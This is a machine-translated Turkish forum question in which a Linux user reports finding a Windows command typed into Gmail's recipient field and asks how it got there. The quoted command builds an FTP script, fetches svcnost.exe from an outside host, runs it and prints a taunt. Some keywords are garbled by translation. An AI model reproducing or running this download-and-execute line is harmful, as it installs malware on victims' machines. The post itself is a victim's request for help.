Ev bilgisayarım genellikle açık, ancak ekran kapalı. Bu akşam işten eve geldim ve hack girişimi gibi görünen şeyleri buldum: tarayıcımda Gmail'im açıktı (bu bendim), ancak bu TO
alanda aşağıdakilerle oluşturuldu :
md / c echo açık cCTeamFtp.yi.org 21 >> ik & echo kullanıcısı ccteam10 765824 >> ik & echo binary >> ik & echo svcnost.exe olsun >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik ik & svcnost.exe & çıkış eko Sahip oldunuz
Bu bana Windows komut satırı koduna benziyor ve md
Gmail'in oluşturma modunda olmasıyla birlikte kodun başlaması, birinin cmd
komut çalıştırmaya çalıştığını açıkça gösteriyor . Sanırım bu bilgisayarda Windows çalıştırmadığım için şanslıydım, ancak başkaları da var. Bu, böyle bir şeyin başıma geldiği ilk kez. Linux gurusu değilim ve o zaman Firefox dışında başka programlar da çalıştırmıyordum.
Bunu yazmadığımdan kesinlikle eminim ve fiziksel olarak bilgisayarımdan başka kimse yoktu. Ayrıca, yakın zamanda Google şifremi (ve diğer tüm şifrelerimi) benzer bir şeyle değiştirdim, vMA8ogd7bv
bu yüzden birinin Google hesabıma saldırdığını sanmıyorum.
Az önce ne oldu? Büyükannemin yıllardır kötü amaçlı yazılımlar çalıştıran eski Windows makinesi değil de yeni bir Ubuntu kurulumu olduğunda, birisi bilgisayarıma nasıl tuş vuruşlar yapıyor?
Güncelleme:
Bazı nokta ve soruları ele alalım:
- Kırsal kesimde Avusturya'dayım. WLAN yönlendiricim WPA2 / PSK ve sözlükte bulunmayan güçlü bir şifre kullanıyor; buradan kaba kuvvet ve 50 metreden daha kısa bir mesafede olması gerekirdi; saldırıya uğraması muhtemel değildir.
- USB kablolu klavye kullanıyorum, bu yüzden yine de herkesin menzil içinde kalması pek mümkün değil.
- O zaman bilgisayarımı kullanmıyordum; Ben işteyken sadece evde boştaydı. Monitöre monte nettop bir bilgisayar olduğu için nadiren kapatıyorum.
- Makine sadece iki aylık, sadece Ubuntu kullanıyor ve ben garip yazılım kullanmıyorum veya garip siteleri ziyaret etmiyorum. Ağırlıklı olarak Stack Exchange, Gmail ve gazeteler var. Oyun yok. Ubuntu kendini güncel tutacak şekilde ayarlandı.
- Çalışan herhangi bir VNC hizmetinin farkında değilim; Kesinlikle bir tane yüklemedi veya etkinleştirmedim. Ayrıca başka bir sunucu başlatmadım. Varsayılan olarak Ubuntu'da çalıştığından emin değilim?
- Gmail’in hesap etkinliğindeki tüm IP adreslerini biliyorum. Google'ın giriş kapısı olmadığından eminim.
- Günlük Dosyası Görüntüleyici buldum , ancak ne arayacağımı bilmiyorum. Yardım?
Gerçekten bilmek istediğim şey, ve beni gerçekten güvensiz hissettiren şey: İnternetten biri makinemde nasıl tuş vuruşları yaratabilir? Bununla ilgili tüm teneke şapka olmadan bunu nasıl önleyebilirim? Ben bir Linux geek değilim, 20+ yıldır Windows ile uğraşan ve bıktım bir babayım. Ve çevrimiçi olduğun 18+ yıl boyunca, kişisel olarak herhangi bir hack girişimi görmedim, bu yüzden bu benim için yeni.
password
:-) değil